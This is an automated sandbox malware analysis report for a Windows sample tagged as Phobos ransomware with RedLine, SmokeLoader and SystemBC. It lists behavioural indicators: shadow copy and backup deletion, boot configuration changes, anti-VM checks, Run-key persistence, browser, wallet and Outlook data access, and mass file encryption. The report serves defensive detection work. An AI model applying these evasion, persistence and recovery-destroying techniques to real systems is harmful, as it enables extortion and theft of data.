Malware Analysis Report

2024-11-16 12:15

Sample ID 230625-hn7rpsec7y
Target file.exe
SHA256 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
Tags
phobos redline smokeloader systembc 1 agilenet backdoor collection evasion infostealer persistence ransomware spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

Phobos

SystemBC

SmokeLoader

RedLine

Renames multiple (371) files with added filename extension

Deletes shadow copies

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Deletes backup catalog

Modifies Windows Firewall

Blocklisted process makes network request

Themida packer

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Drops startup file

Checks whether UAC is enabled

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Uses Task Scheduler COM API

outlook_win_path

Suspicious use of WriteProcessMemory

outlook_office_path

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 06:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 06:54

Reported

2023-06-25 06:56

Platform

win7-20230621-en

Max time kernel

30s

Max time network

33s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

memory/1016-54-0x0000000000BD0000-0x0000000000C1C000-memory.dmp

memory/1016-55-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/2020-59-0x00000000021D0000-0x0000000002210000-memory.dmp

memory/2020-58-0x00000000021D0000-0x0000000002210000-memory.dmp

memory/1016-60-0x0000000004C90000-0x0000000004CD0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 06:54

Reported

2023-06-25 06:56

Platform

win10v2004-20230621-en

Max time kernel

123s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Phobos

ransomware phobos

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (371) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\547C.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sv.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\547C.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-LTR.gif C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-922299981-3641064733-3870770889-1000-MergedResources-0.pri C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.ot C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d5.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-high.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ColorVertexShader.cso C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-72_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-200.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-high.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-16.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\SignInControl.xaml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsnor.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
